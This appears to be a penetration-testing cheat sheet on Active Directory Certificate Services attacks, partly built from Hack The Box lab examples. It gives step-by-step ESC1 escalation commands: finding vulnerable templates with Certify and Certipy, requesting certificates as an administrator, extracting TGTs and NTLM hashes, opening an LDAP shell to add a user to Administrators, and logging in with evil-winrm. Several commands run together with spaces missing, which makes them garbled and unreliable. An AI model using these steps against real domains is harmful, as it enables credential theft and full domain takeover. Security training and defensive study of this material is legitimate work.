AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more.
There are several different attack vectors including below.
Credential theft (dubbed THEFT1 to THEFT5)
Account persistence (dubbed PERSIST1 to PERSIST3)
Domain escalation (dubbed ESC1 to ESC8)
based on misconfigured certificate templates
based on dangerous CA configuration
related to access control vulnerabilities
based on an NTLM relay vulnerability related to the web endpoints of AD CS
Domain persistence (dubbed DPERSIST1 to DPERSIST3)
by forging certificates with a stolen CA certificates
by trusting rogue CA certificates
by maliciously creating vulnerable access controls
Initial Recon
# From UNIX-like systems: Kali> rpcnetgroupmembers"Cert Publishers"-U"DOMAIN"/"User"%"Password"-S"DomainController"# From Windows systems: CMD> netgroup"Cert Publishers"/domain
Vulnerability Check
# Windows # https://github.com/r3motecontrol/Ghostpack-CompiledBinaries CMD> Certify.execasCMD> Certifyfind/vulnerable# Linux# https://github.com/ly4k/CertipyKali> certipyfind-u'user@domain.local'-p'password'-dc-ip'DC_IP'-vulnerable-stdoutKali> certipyfind-uRyan.Cooper-pNuclearMosquito3-targetsequel.htb-text-stdout-vulnerableKali> certipyfind-u'user@domain.local'-p'password'-dc-ip'DC_IP'-old-bloodhound#Certipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).
Certificate templates
Template allows SAN (ESC1)
When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.
Windows
# Find vulnerable/abusable certificate templates using default low-privileged groupCMD> Certify.exefind/vulnerable# Find vulnerable/abusable certificate templates using all groups the current user context is a part of:CMD> Certify.exefind/vulnerable/currentuser# Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).
CMD> Certify.exerequest/ca:'domain\ca'/template:"Vulnerable template"/altname:"admin"# Create a cert.pem based on the base64 cert output by the command above, and convert it to pem format. Kali> opensslpkcs12-incert.pem-keyex-CSP"Microsoft Enhanced Cryptographic Provider v1.0"-export-outcert.pfx# Obtain the TGT. You can convert it to a ccache format to use in Linux laterCMD> .\Rubeus.exeasktgt/user:Administrator/certificate:cert.pfx/ptt# Ask Credentials. You can conduct normal path the hash attack. CMD> .\Rubeus.exeasktgt/user:Administrator/certificate:cert.pfx/getcredentials
See the Pass the Ticket section to convert the ticket to Linux format.
Linux
#To specify a user account in the SANKali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'
certipy req -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -upn Administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
#To specify a computer account in the SANKali> certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'
# Obtain the TGT Kali> certipyauth-pfxadministrator.pfx# After this, you can export it to the KRB5CCNAME variable, and run any commands you want with the new TGT privilege such as secredump/psexec, etc...
# Obtain the credentialsKali> certipyauth-pfx<newcert>.pfx# Typically, you get a NTLM hash. # Pass the cert# 1) Extract Public Key Cert and Private Key Kali> certipycert-pfx<newcert>.pfx-nokey-outuser.crtKali> certipycert-pfx<newcert>.pfx-nocert-outuser.key# 2) Create a ldap shell session with the Cert and KeyKali> python3passthecert.py-actionldap-shell-crtuser.crt-keyuser.key-domainhtb.corp-dc-ip10.129.237.92# #) Add a new user to Administrators LDAP_SHELL> add_user_to_groupsvc_ldapAdministrators# Acccess to the target with new user and credentialKali> evil-winrm-i10.129.237.92-u'svc_ldap@htb.corp'-p'lDaP_1n_th3_cle4r!'
To fix CLOCK SKEY issue
# Synchronize time in case you have CLOCK SKEY issue. Kali> sudontpdate<DCFQDN>sudontupdatedc01.sequel.htb